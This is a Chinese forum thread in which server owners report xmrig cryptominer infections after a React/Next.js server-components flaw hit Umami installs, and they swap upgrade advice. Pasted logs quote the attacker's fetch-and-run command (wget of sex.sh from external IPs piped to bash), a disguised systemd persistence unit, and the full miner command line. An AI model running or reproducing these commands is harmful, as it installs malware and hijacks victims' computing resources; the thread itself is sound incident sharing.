服务器 CPU 报警了,看了下有个挖矿进程:
root 2380791 30.6 13.5 312304 272324 ? Tsl 06:05 1:27 /root/umami/xmrig-6.24.0/xmrig --url pool.hashvault.pro:443 --user 8BWy7pgane96sLATF7nESM4ehZEtYAFNpYFAm88zftVsJ5jxFBdGVBrd1igptedXejfomPEpJvGUKU1etmkNBXmU5HkPR6e --pass ZimbabveDC --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14 服务器上有个 umami 这个网站统计软件用了 react next.js server ,才报漏洞,今天就被扫到了。。。黑产效率很高
 | 1 lemoncoconut 19 小时 39 分钟前 感谢楼主,立马升级了 umami |
 | 2 lizhenda 19 小时 28 分钟前 这年头挖矿的木马还能有多少收益? |
 | 3 ponycool 19 小时 25 分钟前 CVE-2025-55182 CVSS 10.0 https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components |
 | 4 dianso 19 小时 23 分钟前 上周日已经拿到工具了,没想到这周就爆料了,损失几百 U |
 | 5 fwh 19 小时 23 分钟前 我的也是,nextjs 项目目录下多了 sex.sh 、xmrig 这几个文件,这是 pm2 日志记录,也不知道怎么攻击的 2025-12-05T13:20:27: --2025-12-05 13:18:47-- http://46.36.37.85:12000/sex.sh 2025-12-05T13:20:27: Connecting to 46.36.37.85:12000... connected. 2025-12-05T13:20:27: HTTP request sent, awaiting response... 200 OK 2025-12-05T13:20:27: Length: 1621 (1.6K) [application/x-sh] 2025-12-05T13:20:27: Saving to: ‘sex.sh’ 2025-12-05T13:20:27: 2025-12-05T13:20:27: 0K . 100% 171M=0s 2025-12-05T13:20:27: 2025-12-05T13:20:27: 2025-12-05 13:18:47 (171 MB/s) - ‘sex.sh’ saved [1621/1621] 2025-12-05T13:20:27: 2025-12-05T13:20:27: % Total % Received% Xferd Average Speed Time Time Time Current 2025-12-05T13:20:27: Dload Upload Total Spent Left Speed 2025-12-05T13:20:27: 98 3439k 98 3400k 0 0 35755 0 0:01:38 0:01:37 0:00:01 26312 99 3439k 99 3426k 0 0 35697 0 0:01:38 0:01:38 --:--:-- 23629 100 3439k 100 3439k 0 0 35653 0 0:01:38 0:01:38 --:--:-- 24491 2025-12-05T13:20:27: Created symlink /etc/systemd/system/multi-user.target.wants/system-update-service.service → /etc/systemd/system/system-update-service.service. 2025-12-05T13:20:28: --2025-12-05 13:20:27-- http://46.36.37.85:12000/sex.sh 2025-12-05T13:20:28: Connecting to 46.36.37.85:12000... connected. 2025-12-05T13:20:28: HTTP request sent, awaiting response... 200 OK 2025-12-05T13:20:28: Length: 1621 (1.6K) [application/x-sh] 2025-12-05T13:20:28: Saving to: ‘sex.sh.1’ 2025-12-05T13:20:28: 2025-12-05T13:20:28: 0K . 100% 198M=0s 2025-12-05T13:20:28: 2025-12-05T13:20:28: 2025-12-05 13:20:27 (198 MB/s) - ‘sex.sh.1’ saved [1621/1621] 2025-12-05T13:20:28: |
 | 6 Nanosk 19 小时 5 分钟前 @fwh [TypeError: Failed to parse body as FormData.] [TypeError: Cannot read properties of undefined (reading 'workers')] [TypeError: Cannot read properties of undefined (reading 'workers')] [TypeError: Cannot read properties of undefined (reading 'workers')] Connecting to 216.158.232.43:12000 (216.158.232.43:12000) saving to 'sex.sh' sex.sh 100% |********************************| 1615 0:00:00 ETA 'sex.sh' saved /bin/sh: bash: not found [Error: Command failed: wget http://216.158.232.43:12000/sex.sh && bash sex.sh Connecting to 216.158.232.43:12000 (216.158.232.43:12000) saving to 'sex.sh' sex.sh 100% |********************************| 1615 0:00:00 ETA 'sex.sh' saved /bin/sh: bash: not found ] { status: 127, signal: null, output: [Array], pid: 46, stdout: <Buffer >, stderr: <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 31 36 2e 31 35 38 2e 32 33 32 2e 34 33 3a 31 32 30 30 30 20 28 32 31 36 2e 31 35 38 2e 32 33 32 2e 34 33 ... 147 more bytes>, digest: '4032595826' } 差不多 但是因为容器没 bash 没法执行 |
 | 7 zhangyunlu80 19 小时 0 分钟前 react2shell 升级吧 |
 | 8 cnhongwei 18 小时 53 分钟前 我是使用 Docker 来运行,page 路由,这个应没有问题吧? |
Select Language